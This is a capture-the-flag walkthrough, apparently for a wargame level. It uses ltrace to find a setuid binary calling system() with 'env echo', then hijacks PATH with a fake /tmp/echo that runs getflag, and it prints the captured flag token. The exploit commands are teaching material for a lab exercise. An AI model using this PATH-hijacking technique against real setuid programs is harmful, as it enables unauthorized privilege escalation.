As level03 if we run ls we see that a level03 binary is present in the home directory.
$> ./level03
Exploit meIn order to exploit this binary, we need to know what it does.
Using ltrace, we can grasp what the program does by showing us system and dynamic library calls.
$> ltrace ./level03
__libc_start_main(0x80484a4, 1, 0xbffff7f4, 0x8048510, 0x8048580 <unfinished ...>
getegid() = 2003
geteuid() = 2003
setresgid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
setresuid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
system("/usr/bin/env echo Exploit me"Exploit me
<unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 0
+++ exited (status 0) +++As we can see this program checks effective GID and UID before setting them back to the same values so we don't care about this part.
We need to focus on the system() call that basically execute a string as a shell command. It is known to be exploitable and it is the case here because echo is involved here. We simply need to override what echo stands for by adding at the beginning of the $PATH another version of it.
$> echo "/bin/getflag" > /tmp/echo
$> chmod 777 /tmp/echo && export PATH=/tmp:$PATHIt would work for anything else that is supposed to be evaluated through
$PATHas well. Because this variable is an ordered list of directories to look through to find executable files, the first occurence that matches will be used as source of truth.
Let's check details about this binary with ls -l level03...
$> ls -l level03
-rwsr-sr-x 1 flag03 level03 8627 Mar 5 2016 level03 Since this program is owned by
flag03, overridingechobygetflagwill work correctly because the binary is executed asflag03who has the right to run this command.
Finally, run the binary once more to get this level's flag.
$> ./level03
Check flag.Here is your token : qi0maab88jeaj46qoumi7mausSo, qi0maab88jeaj46qoumi7maus is the flag for this level.